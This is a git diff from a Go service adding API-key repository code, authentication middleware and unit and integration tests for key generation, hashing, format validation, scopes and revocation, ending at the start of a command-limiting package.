||||
&key.RevokedAt,
|
||||
&key.CreatedBy,
|
||||
); err != nil {
|
||||
return nil, fmt.Errorf("scan key: %w", err)
|
||||
}
|
||||
key.ID = domain.APIKeyID(id)
|
||||
key.Scopes = scopesFromStrings(scopeStrings)
|
||||
key.ProjectIDs = projectIDsFromStrings(projectIDs)
|
||||
keys = append(keys, &key)
|
||||
}
|
||||
|
||||
return keys, nil
|
||||
}
|
||||
|
||||
// Revoke marks an API key as revoked.
|
||||
func (r *APIKeyRepository) Revoke(ctx context.Context, id domain.APIKeyID) error {
|
||||
result, err := r.db.ExecContext(ctx, `
|
||||
UPDATE api_keys SET revoked_at = NOW()
|
||||
WHERE id = $1 AND revoked_at IS NULL
|
||||
`, string(id))
|
||||
if err != nil {
|
||||
return fmt.Errorf("revoke key: %w", err)
|
||||
}
|
||||
|
||||
rows, err := result.RowsAffected()
|
||||
if err != nil {
|
||||
return fmt.Errorf("rows affected: %w", err)
|
||||
}
|
||||
|
||||
if rows == 0 {
|
||||
return domain.ErrKeyNotFound
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// UpdateLastUsed updates the last used timestamp for a key.
|
||||
func (r *APIKeyRepository) UpdateLastUsed(ctx context.Context, id domain.APIKeyID) error {
|
||||
_, err := r.db.ExecContext(ctx, `
|
||||
UPDATE api_keys SET last_used_at = NOW() WHERE id = $1
|
||||
`, string(id))
|
||||
return err
|
||||
}
|
||||
|
||||
// Helper functions for scope conversion
|
||||
func scopesToStrings(scopes []domain.Scope) []string {
|
||||
ss := make([]string, len(scopes))
|
||||
for i, s := range scopes {
|
||||
ss[i] = string(s)
|
||||
}
|
||||
return ss
|
||||
}
|
||||
|
||||
func scopesFromStrings(ss []string) []domain.Scope {
|
||||
scopes := make([]domain.Scope, len(ss))
|
||||
for i, s := range ss {
|
||||
scopes[i] = domain.Scope(s)
|
||||
}
|
||||
return scopes
|
||||
}
|
||||
|
||||
func projectIDsToStrings(ids []domain.ProjectID) []string {
|
||||
if ids == nil {
|
||||
return nil
|
||||
}
|
||||
ss := make([]string, len(ids))
|
||||
for i, id := range ids {
|
||||
ss[i] = string(id)
|
||||
}
|
||||
return ss
|
||||
}
|
||||
|
||||
func projectIDsFromStrings(ss []string) []domain.ProjectID {
|
||||
if ss == nil {
|
||||
return nil
|
||||
}
|
||||
ids := make([]domain.ProjectID, len(ss))
|
||||
for i, s := range ss {
|
||||
ids[i] = domain.ProjectID(s)
|
||||
}
|
||||
return ids
|
||||
}
|
||||
203
internal/auth/keys_test.go
Normal file
203
internal/auth/keys_test.go
Normal file
@ -0,0 +1,203 @@
|
||||
package auth
|
||||
|
||||
import (
|
||||
"testing"
|
||||
"time"
|
||||
)
|
||||
|
||||
func TestParseExpiration(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
input string
|
||||
want time.Duration
|
||||
wantErr bool
|
||||
}{
|
||||
{"30d", "30d", Expiration30Days, false},
|
||||
{"30", "30", Expiration30Days, false},
|
||||
{"60d", "60d", Expiration60Days, false},
|
||||
{"60", "60", Expiration60Days, false},
|
||||
{"90d", "90d", Expiration90Days, false},
|
||||
{"90", "90", Expiration90Days, false},
|
||||
{"1y", "1y", Expiration1Year, false},
|
||||
{"1year", "1year", Expiration1Year, false},
|
||||
{"365d", "365d", Expiration1Year, false},
|
||||
{"never", "never", ExpirationNoLimit, false},
|
||||
{"none", "none", ExpirationNoLimit, false},
|
||||
{"empty", "", ExpirationNoLimit, false},
|
||||
{"case insensitive", "30D", Expiration30Days, false},
|
||||
{"invalid", "invalid", 0, true},
|
||||
{"7d", "7d", 0, true},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
got, err := ParseExpiration(tt.input)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ParseExpiration(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr)
|
||||
return
|
||||
}
|
||||
if got != tt.want {
|
||||
t.Errorf("ParseExpiration(%q) = %v, want %v", tt.input, got, tt.want)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestExpiresAt(t *testing.T) {
|
||||
t.Run("returns nil for zero duration", func(t *testing.T) {
|
||||
got := ExpiresAt(0)
|
||||
if got != nil {
|
||||
t.Errorf("ExpiresAt(0) = %v, want nil", got)
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("returns future time for positive duration", func(t *testing.T) {
|
||||
before := time.Now()
|
||||
got := ExpiresAt(24 * time.Hour)
|
||||
after := time.Now()
|
||||
|
||||
if got == nil {
|
||||
t.Fatal("ExpiresAt(24h) returned nil")
|
||||
}
|
||||
|
||||
expectedMin := before.Add(24 * time.Hour)
|
||||
expectedMax := after.Add(24 * time.Hour)
|
||||
|
||||
if got.Before(expectedMin) || got.After(expectedMax) {
|
||||
t.Errorf("ExpiresAt(24h) = %v, want between %v and %v", *got, expectedMin, expectedMax)
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
func TestGenerateKey(t *testing.T) {
|
||||
t.Run("generates unique keys", func(t *testing.T) {
|
||||
key1, id1, err := GenerateKey()
|
||||
if err != nil {
|
||||
t.Fatalf("GenerateKey() error = %v", err)
|
||||
}
|
||||
|
||||
key2, id2, err := GenerateKey()
|
||||
if err != nil {
|
||||
t.Fatalf("GenerateKey() error = %v", err)
|
||||
}
|
||||
|
||||
if key1 == key2 {
|
||||
t.Error("Generated keys should be unique")
|
||||
}
|
||||
|
||||
if id1 == id2 {
|
||||
t.Error("Generated identifiers should be unique")
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("key has correct format", func(t *testing.T) {
|
||||
key, id, err := GenerateKey()
|
||||
if err != nil {
|
||||
t.Fatalf("GenerateKey() error = %v", err)
|
||||
}
|
||||
|
||||
if !ValidateKeyFormat(key) {
|
||||
t.Errorf("Generated key %q has invalid format", key)
|
||||
}
|
||||
|
||||
if len(id) != KeyIdentifierLength {
|
||||
t.Errorf("Identifier length = %d, want %d", len(id), KeyIdentifierLength)
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("key contains prefix and identifier", func(t *testing.T) {
|
||||
key, id, err := GenerateKey()
|
||||
if err != nil {
|
||||
t.Fatalf("GenerateKey() error = %v", err)
|
||||
}
|
||||
|
||||
expectedPrefix := KeyPrefix + id + "_"
|
||||
if key[:len(expectedPrefix)] != expectedPrefix {
|
||||
t.Errorf("Key %q should start with %q", key, expectedPrefix)
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
func TestHashKey(t *testing.T) {
|
||||
t.Run("produces consistent hash", func(t *testing.T) {
|
||||
key := "rdev_sk_abc12345_0123456789abcdef0123456789abcdef"
|
||||
hash1 := HashKey(key)
|
||||
hash2 := HashKey(key)
|
||||
|
||||
if hash1 != hash2 {
|
||||
t.Error("Same key should produce same hash")
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("different keys produce different hashes", func(t *testing.T) {
|
||||
hash1 := HashKey("key1")
|
||||
hash2 := HashKey("key2")
|
||||
|
||||
if hash1 == hash2 {
|
||||
t.Error("Different keys should produce different hashes")
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("hash is hex encoded", func(t *testing.T) {
|
||||
hash := HashKey("test")
|
||||
// SHA-256 produces 32 bytes = 64 hex characters
|
||||
if len(hash) != 64 {
|
||||
t.Errorf("Hash length = %d, want 64", len(hash))
|
||||
}
|
||||
|
||||
for _, c := range hash {
|
||||
if !((c >= '0' && c <= '9') || (c >= 'a' && c <= 'f')) {
|
||||
t.Errorf("Hash contains non-hex character: %c", c)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
func TestValidateKeyFormat(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
key string
|
||||
want bool
|
||||
}{
|
||||
{"valid key", "rdev_sk_abc12345_0123456789abcdef0123456789abcdef", true},
|
||||
{"missing prefix", "abc12345_0123456789abcdef0123456789abcdef", false},
|
||||
{"wrong prefix", "api_sk_abc12345_0123456789abcdef0123456789abcdef", false},
|
||||
{"short identifier", "rdev_sk_abc1234_0123456789abcdef0123456789abcdef", false},
|
||||
{"long identifier", "rdev_sk_abc123456_0123456789abcdef0123456789abcdef", false},
|
||||
{"short random", "rdev_sk_abc12345_0123456789abcdef", false},
|
||||
{"long random", "rdev_sk_abc12345_0123456789abcdef0123456789abcdef00", false},
|
||||
{"missing underscore", "rdev_sk_abc123450123456789abcdef0123456789abcdef", false},
|
||||
{"extra underscore", "rdev_sk_abc12345_0123_456789abcdef0123456789abcdef", false},
|
||||
{"empty", "", false},
|
||||
{"only prefix", "rdev_sk_", false},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
if got := ValidateKeyFormat(tt.key); got != tt.want {
|
||||
t.Errorf("ValidateKeyFormat(%q) = %v, want %v", tt.key, got, tt.want)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestExtractPrefix(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
key string
|
||||
want string
|
||||
}{
|
||||
{"valid key", "rdev_sk_abc12345_0123456789abcdef0123456789abcdef", "abc12345"},
|
||||
{"missing prefix", "abc12345_random", ""},
|
||||
{"only rdev_sk_", "rdev_sk_", ""},
|
||||
{"empty", "", ""},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
if got := ExtractPrefix(tt.key); got != tt.want {
|
||||
t.Errorf("ExtractPrefix(%q) = %q, want %q", tt.key, got, tt.want)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
@ -25,6 +25,12 @@ func GetAPIKey(ctx context.Context) *APIKey {
|
||||
return key
|
||||
}
|
||||
|
||||
// WithAPIKey returns a context with the given API key set.
|
||||
// This is primarily useful for testing.
|
||||
func WithAPIKey(ctx context.Context, apiKey *APIKey) context.Context {
|
||||
return context.WithValue(ctx, contextKeyAPIKey, apiKey)
|
||||
}
|
||||
|
||||
// Middleware creates an authentication middleware.
|
||||
func Middleware(svc *Service) func(http.Handler) http.Handler {
|
||||
return func(next http.Handler) http.Handler {
|
||||
|
||||
155
internal/auth/scopes_test.go
Normal file
155
internal/auth/scopes_test.go
Normal file
@ -0,0 +1,155 @@
|
||||
package auth
|
||||
|
||||
import (
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestScopeIsValid(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
scope Scope
|
||||
want bool
|
||||
}{
|
||||
{"projects:read", ScopeProjectsRead, true},
|
||||
{"projects:execute", ScopeProjectsExecute, true},
|
||||
{"keys:read", ScopeKeysRead, true},
|
||||
{"keys:write", ScopeKeysWrite, true},
|
||||
{"admin", ScopeAdmin, true},
|
||||
{"invalid", Scope("invalid"), false},
|
||||
{"empty", Scope(""), false},
|
||||
{"similar", Scope("projects:write"), false},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
if got := tt.scope.IsValid(); got != tt.want {
|
||||
t.Errorf("Scope(%q).IsValid() = %v, want %v", tt.scope, got, tt.want)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestScopesFromStrings(t *testing.T) {
|
||||
input := []string{"projects:read", "keys:write"}
|
||||
got := ScopesFromStrings(input)
|
||||
|
||||
if len(got) != 2 {
|
||||
t.Fatalf("ScopesFromStrings() returned %d scopes, want 2", len(got))
|
||||
}
|
||||
|
||||
if got[0] != ScopeProjectsRead {
|
||||
t.Errorf("got[0] = %v, want %v", got[0], ScopeProjectsRead)
|
||||
}
|
||||
|
||||
if got[1] != ScopeKeysWrite {
|
||||
t.Errorf("got[1] = %v, want %v", got[1], ScopeKeysWrite)
|
||||
}
|
||||
}
|
||||
|
||||
func TestScopesToStrings(t *testing.T) {
|
||||
input := []Scope{ScopeProjectsRead, ScopeKeysWrite}
|
||||
got := ScopesToStrings(input)
|
||||
|
||||
if len(got) != 2 {
|
||||
t.Fatalf("ScopesToStrings() returned %d strings, want 2", len(got))
|
||||
}
|
||||
|
||||
if got[0] != "projects:read" {
|
||||
t.Errorf("got[0] = %q, want %q", got[0], "projects:read")
|
||||
}
|
||||
|
||||
if got[1] != "keys:write" {
|
||||
t.Errorf("got[1] = %q, want %q", got[1], "keys:write")
|
||||
}
|
||||
}
|
||||
|
||||
func TestValidateScopes(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
scopes []Scope
|
||||
want bool
|
||||
}{
|
||||
{"all valid", []Scope{ScopeProjectsRead, ScopeKeysWrite}, true},
|
||||
{"single valid", []Scope{ScopeAdmin}, true},
|
||||
{"empty", []Scope{}, true},
|
||||
{"one invalid", []Scope{ScopeProjectsRead, Scope("invalid")}, false},
|
||||
{"all invalid", []Scope{Scope("foo"), Scope("bar")}, false},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
if got := ValidateScopes(tt.scopes); got != tt.want {
|
||||
t.Errorf("ValidateScopes() = %v, want %v", got, tt.want)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestHasScope(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
scopes []Scope
|
||||
required Scope
|
||||
want bool
|
||||
}{
|
||||
{"has exact scope", []Scope{ScopeProjectsRead, ScopeKeysRead}, ScopeProjectsRead, true},
|
||||
{"admin grants all", []Scope{ScopeAdmin}, ScopeProjectsRead, true},
|
||||
{"admin grants keys", []Scope{ScopeAdmin}, ScopeKeysWrite, true},
|
||||
{"missing scope", []Scope{ScopeProjectsRead}, ScopeKeysWrite, false},
|
||||
{"empty scopes", []Scope{}, ScopeProjectsRead, false},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
if got := HasScope(tt.scopes, tt.required); got != tt.want {
|
||||
t.Errorf("HasScope() = %v, want %v", got, tt.want)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestHasAnyScope(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
scopes []Scope
|
||||
required []Scope
|
||||
want bool
|
||||
}{
|
||||
{"has first", []Scope{ScopeProjectsRead}, []Scope{ScopeProjectsRead, ScopeKeysRead}, true},
|
||||
{"has second", []Scope{ScopeKeysRead}, []Scope{ScopeProjectsRead, ScopeKeysRead}, true},
|
||||
{"has neither", []Scope{ScopeKeysWrite}, []Scope{ScopeProjectsRead, ScopeKeysRead}, false},
|
||||
{"admin grants any", []Scope{ScopeAdmin}, []Scope{ScopeProjectsRead, ScopeKeysRead}, true},
|
||||
{"empty required", []Scope{ScopeProjectsRead}, []Scope{}, false},
|
||||
{"empty scopes", []Scope{}, []Scope{ScopeProjectsRead}, false},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
if got := HasAnyScope(tt.scopes, tt.required...); got != tt.want {
|
||||
t.Errorf("HasAnyScope() = %v, want %v", got, tt.want)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestHasProjectAccess(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
allowed []string
|
||||
project string
|
||||
want bool
|
||||
}{
|
||||
{"nil allows all", nil, "any-project", true},
|
||||
{"in list", []string{"proj-a", "proj-b"}, "proj-a", true},
|
||||
{"not in list", []string{"proj-a", "proj-b"}, "proj-c", false},
|
||||
{"empty list denies", []string{}, "proj-a", false},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
if got := HasProjectAccess(tt.allowed, tt.project); got != tt.want {
|
||||
t.Errorf("HasProjectAccess() = %v, want %v", got, tt.want)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
394
internal/auth/service_test.go
Normal file
394
internal/auth/service_test.go
Normal file
@ -0,0 +1,394 @@
|
||||
package auth
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"github.com/orchard9/rdev/internal/testutil"
|
||||
)
|
||||
|
||||
func TestAPIKey_IsExpired(t *testing.T) {
|
||||
now := time.Now()
|
||||
past := now.Add(-1 * time.Hour)
|
||||
future := now.Add(1 * time.Hour)
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
key *APIKey
|
||||
want bool
|
||||
}{
|
||||
{"nil expiration", &APIKey{ExpiresAt: nil}, false},
|
||||
{"expired", &APIKey{ExpiresAt: &past}, true},
|
||||
{"not expired", &APIKey{ExpiresAt: &future}, false},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
if got := tt.key.IsExpired(); got != tt.want {
|
||||
t.Errorf("IsExpired() = %v, want %v", got, tt.want)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestAPIKey_IsRevoked(t *testing.T) {
|
||||
now := time.Now()
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
key *APIKey
|
||||
want bool
|
||||
}{
|
||||
{"not revoked", &APIKey{RevokedAt: nil}, false},
|
||||
{"revoked", &APIKey{RevokedAt: &now}, true},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
if got := tt.key.IsRevoked(); got != tt.want {
|
||||
t.Errorf("IsRevoked() = %v, want %v", got, tt.want)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestAPIKey_IsActive(t *testing.T) {
|
||||
now := time.Now()
|
||||
past := now.Add(-1 * time.Hour)
|
||||
future := now.Add(1 * time.Hour)
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
key *APIKey
|
||||
want bool
|
||||
}{
|
||||
{"active", &APIKey{ExpiresAt: &future, RevokedAt: nil}, true},
|
||||
{"expired", &APIKey{ExpiresAt: &past, RevokedAt: nil}, false},
|
||||
{"revoked", &APIKey{ExpiresAt: &future, RevokedAt: &now}, false},
|
||||
{"never expires", &APIKey{ExpiresAt: nil, RevokedAt: nil}, true},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
if got := tt.key.IsActive(); got != tt.want {
|
||||
t.Errorf("IsActive() = %v, want %v", got, tt.want)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestService_IsAdminKey(t *testing.T) {
|
||||
svc := NewService(nil, "admin-secret")
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
key string
|
||||
want bool
|
||||
}{
|
||||
{"matches admin key", "admin-secret", true},
|
||||
{"wrong key", "wrong-key", false},
|
||||
{"empty key", "", false},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
if got := svc.IsAdminKey(tt.key); got != tt.want {
|
||||
t.Errorf("IsAdminKey(%q) = %v, want %v", tt.key, got, tt.want)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestService_IsAdminKey_NoAdminKey(t *testing.T) {
|
||||
svc := NewService(nil, "")
|
||||
|
||||
if svc.IsAdminKey("anything") {
|
||||
t.Error("IsAdminKey should return false when no admin key is set")
|
||||
}
|
||||
}
|
||||
|
||||
// Integration tests - require database
|
||||
func TestService_Create(t *testing.T) {
|
||||
db := testutil.TestDB(t)
|
||||
t.Cleanup(func() { testutil.CleanupTestKeys(t, db) })
|
||||
|
||||
svc := NewService(db, "admin-key")
|
||||
|
||||
t.Run("creates key with valid scopes", func(t *testing.T) {
|
||||
resp, err := svc.Create(context.Background(), CreateKeyRequest{
|
||||
Name: "test-key-1",
|
||||
Scopes: []Scope{ScopeProjectsRead},
|
||||
ExpiresIn: 24 * time.Hour,
|
||||
CreatedBy: "test",
|
||||
})
|
||||
|
||||
if err != nil {
|
||||
t.Fatalf("Create() error = %v", err)
|
||||
}
|
||||
|
||||
if resp.Secret == "" {
|
||||
t.Error("Create() returned empty secret")
|
||||
}
|
||||
|
||||
if !ValidateKeyFormat(resp.Secret) {
|
||||
t.Errorf("Create() returned invalid key format: %q", resp.Secret)
|
||||
}
|
||||
|
||||
if resp.Key.Name != "test-key-1" {
|
||||
t.Errorf("Key.Name = %q, want %q", resp.Key.Name, "test-key-1")
|
||||
}
|
||||
|
||||
if len(resp.Key.Scopes) != 1 || resp.Key.Scopes[0] != ScopeProjectsRead {
|
||||
t.Errorf("Key.Scopes = %v, want [%v]", resp.Key.Scopes, ScopeProjectsRead)
|
||||
}
|
||||
|
||||
if resp.Key.ExpiresAt == nil {
|
||||
t.Error("Key.ExpiresAt should not be nil")
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("rejects invalid scopes", func(t *testing.T) {
|
||||
_, err := svc.Create(context.Background(), CreateKeyRequest{
|
||||
Name: "test-key-invalid",
|
||||
Scopes: []Scope{Scope("invalid:scope")},
|
||||
CreatedBy: "test",
|
||||
})
|
||||
|
||||
if err == nil {
|
||||
t.Error("Create() should reject invalid scopes")
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("creates key with no expiration", func(t *testing.T) {
|
||||
resp, err := svc.Create(context.Background(), CreateKeyRequest{
|
||||
Name: "test-key-no-expire",
|
||||
Scopes: []Scope{ScopeAdmin},
|
||||
ExpiresIn: 0,
|
||||
CreatedBy: "test",
|
||||
})
|
||||
|
||||
if err != nil {
|
||||
t.Fatalf("Create() error = %v", err)
|
||||
}
|
||||
|
||||
if resp.Key.ExpiresAt != nil {
|
||||
t.Error("Key.ExpiresAt should be nil for no expiration")
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("creates key with project restrictions", func(t *testing.T) {
|
||||
resp, err := svc.Create(context.Background(), CreateKeyRequest{
|
||||
Name: "test-key-projects",
|
||||
Scopes: []Scope{ScopeProjectsRead},
|
||||
ProjectIDs: []string{"proj-a", "proj-b"},
|
||||
ExpiresIn: 24 * time.Hour,
|
||||
CreatedBy: "test",
|
||||
})
|
||||
|
||||
if err != nil {
|
||||
t.Fatalf("Create() error = %v", err)
|
||||
}
|
||||
|
||||
if len(resp.Key.ProjectIDs) != 2 {
|
||||
t.Errorf("Key.ProjectIDs length = %d, want 2", len(resp.Key.ProjectIDs))
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
func TestService_Validate(t *testing.T) {
|
||||
db := testutil.TestDB(t)
|
||||
t.Cleanup(func() { testutil.CleanupTestKeys(t, db) })
|
||||
|
||||
svc := NewService(db, "admin-key-test")
|
||||
|
||||
t.Run("validates admin key", func(t *testing.T) {
|
||||
key, err := svc.Validate(context.Background(), "admin-key-test")
|
||||
if err != nil {
|
||||
t.Fatalf("Validate() error = %v", err)
|
||||
}
|
||||
|
||||
if key.ID != "admin" {
|
||||
t.Errorf("Key.ID = %q, want %q", key.ID, "admin")
|
||||
}
|
||||
|
||||
if !HasScope(key.Scopes, ScopeAdmin) {
|
||||
t.Error("Admin key should have admin scope")
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("validates created key", func(t *testing.T) {
|
||||
// Create a key first
|
||||
resp, err := svc.Create(context.Background(), CreateKeyRequest{
|
||||
Name: "test-validate-key",
|
||||
Scopes: []Scope{ScopeProjectsRead, ScopeKeysRead},
|
||||
ExpiresIn: 24 * time.Hour,
|
||||
CreatedBy: "test",
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("Create() error = %v", err)
|
||||
}
|
||||
|
||||
// Validate it
|
||||
key, err := svc.Validate(context.Background(), resp.Secret)
|
||||
if err != nil {
|
||||
t.Fatalf("Validate() error = %v", err)
|
||||
}
|
||||
|
||||
if key.Name != "test-validate-key" {
|
||||
t.Errorf("Key.Name = %q, want %q", key.Name, "test-validate-key")
|
||||
}
|
||||
|
||||
if len(key.Scopes) != 2 {
|
||||
t.Errorf("Key.Scopes length = %d, want 2", len(key.Scopes))
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("rejects invalid format", func(t *testing.T) {
|
||||
_, err := svc.Validate(context.Background(), "not-a-valid-key")
|
||||
if err != ErrKeyNotFound {
|
||||
t.Errorf("Validate() error = %v, want %v", err, ErrKeyNotFound)
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("rejects unknown key", func(t *testing.T) {
|
||||
// Valid format but not in database
|
||||
_, err := svc.Validate(context.Background(), "rdev_sk_abc12345_0123456789abcdef0123456789abcdef")
|
||||
if err != ErrKeyNotFound {
|
||||
t.Errorf("Validate() error = %v, want %v", err, ErrKeyNotFound)
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
func TestService_List(t *testing.T) {
|
||||
db := testutil.TestDB(t)
|
||||
t.Cleanup(func() { testutil.CleanupTestKeys(t, db) })
|
||||
|
||||
svc := NewService(db, "admin-key")
|
||||
|
||||
// Create some test keys
|
||||
for i := 0; i < 3; i++ {
|
||||
_, err := svc.Create(context.Background(), CreateKeyRequest{
|
||||
Name: fmt.Sprintf("test-list-key-%d", i),
|
||||
Scopes: []Scope{ScopeProjectsRead},
|
||||
ExpiresIn: 24 * time.Hour,
|
||||
CreatedBy: "test",
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("Create() error = %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
keys, err := svc.List(context.Background())
|
||||
if err != nil {
|
||||
t.Fatalf("List() error = %v", err)
|
||||
}
|
||||
|
||||
// Should have at least our 3 test keys
|
||||
testKeyCount := 0
|
||||
for _, k := range keys {
|
||||
if k.Name[:10] == "test-list-" {
|
||||
testKeyCount++
|
||||
}
|
||||
}
|
||||
|
||||
if testKeyCount != 3 {
|
||||
t.Errorf("List() returned %d test keys, want 3", testKeyCount)
|
||||
}
|
||||
}
|
||||
|
||||
func TestService_Get(t *testing.T) {
|
||||
db := testutil.TestDB(t)
|
||||
t.Cleanup(func() { testutil.CleanupTestKeys(t, db) })
|
||||
|
||||
svc := NewService(db, "admin-key")
|
||||
|
||||
t.Run("gets existing key", func(t *testing.T) {
|
||||
resp, err := svc.Create(context.Background(), CreateKeyRequest{
|
||||
Name: "test-get-key",
|
||||
Scopes: []Scope{ScopeProjectsRead},
|
||||
ExpiresIn: 24 * time.Hour,
|
||||
CreatedBy: "test",
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("Create() error = %v", err)
|
||||
}
|
||||
|
||||
key, err := svc.Get(context.Background(), resp.Key.ID)
|
||||
if err != nil {
|
||||
t.Fatalf("Get() error = %v", err)
|
||||
}
|
||||
|
||||
if key.Name != "test-get-key" {
|
||||
t.Errorf("Key.Name = %q, want %q", key.Name, "test-get-key")
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("returns error for unknown key", func(t *testing.T) {
|
||||
_, err := svc.Get(context.Background(), "00000000-0000-0000-0000-000000000000")
|
||||
if err != ErrKeyNotFound {
|
||||
t.Errorf("Get() error = %v, want %v", err, ErrKeyNotFound)
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
func TestService_Revoke(t *testing.T) {
|
||||
db := testutil.TestDB(t)
|
||||
t.Cleanup(func() { testutil.CleanupTestKeys(t, db) })
|
||||
|
||||
svc := NewService(db, "admin-key")
|
||||
|
||||
t.Run("revokes existing key", func(t *testing.T) {
|
||||
resp, err := svc.Create(context.Background(), CreateKeyRequest{
|
||||
Name: "test-revoke-key",
|
||||
Scopes: []Scope{ScopeProjectsRead},
|
||||
ExpiresIn: 24 * time.Hour,
|
||||
CreatedBy: "test",
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("Create() error = %v", err)
|
||||
}
|
||||
|
||||
err = svc.Revoke(context.Background(), resp.Key.ID)
|
||||
if err != nil {
|
||||
t.Fatalf("Revoke() error = %v", err)
|
||||
}
|
||||
|
||||
// Validate should fail
|
||||
_, err = svc.Validate(context.Background(), resp.Secret)
|
||||
if err != ErrKeyRevoked {
|
||||
t.Errorf("Validate() after revoke error = %v, want %v", err, ErrKeyRevoked)
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("returns error for unknown key", func(t *testing.T) {
|
||||
err := svc.Revoke(context.Background(), "00000000-0000-0000-0000-000000000000")
|
||||
if err != ErrKeyNotFound {
|
||||
t.Errorf("Revoke() error = %v, want %v", err, ErrKeyNotFound)
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("idempotent for already revoked", func(t *testing.T) {
|
||||
resp, err := svc.Create(context.Background(), CreateKeyRequest{
|
||||
Name: "test-revoke-twice",
|
||||
Scopes: []Scope{ScopeProjectsRead},
|
||||
ExpiresIn: 24 * time.Hour,
|
||||
CreatedBy: "test",
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("Create() error = %v", err)
|
||||
}
|
||||
|
||||
// Revoke once
|
||||
if err := svc.Revoke(context.Background(), resp.Key.ID); err != nil {
|
||||
t.Fatalf("First Revoke() error = %v", err)
|
||||
}
|
||||
|
||||
// Revoke again - should return not found (no rows affected)
|
||||
err = svc.Revoke(context.Background(), resp.Key.ID)
|
||||
if err != ErrKeyNotFound {
|
||||
t.Errorf("Second Revoke() error = %v, want %v", err, ErrKeyNotFound)
|
||||
}
|
||||
})
|
||||
}
|
||||
197
internal/cmdlimit/cmdlimit.go
Normal file
197
internal/cmdlimit/cmdlimit.go
Normal file
@ -0,0 +1,197 @@
|
||||
// Package cmdlimit provides concurrent command limiting to prevent resource exhaustion.
|
||||
package cmdlimit
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"sync"
|
||||
"time"
|
||||
)
|
||||
|
||||
// ErrLimitExceeded is returned when the concurrent command limit is reached.
|
||||
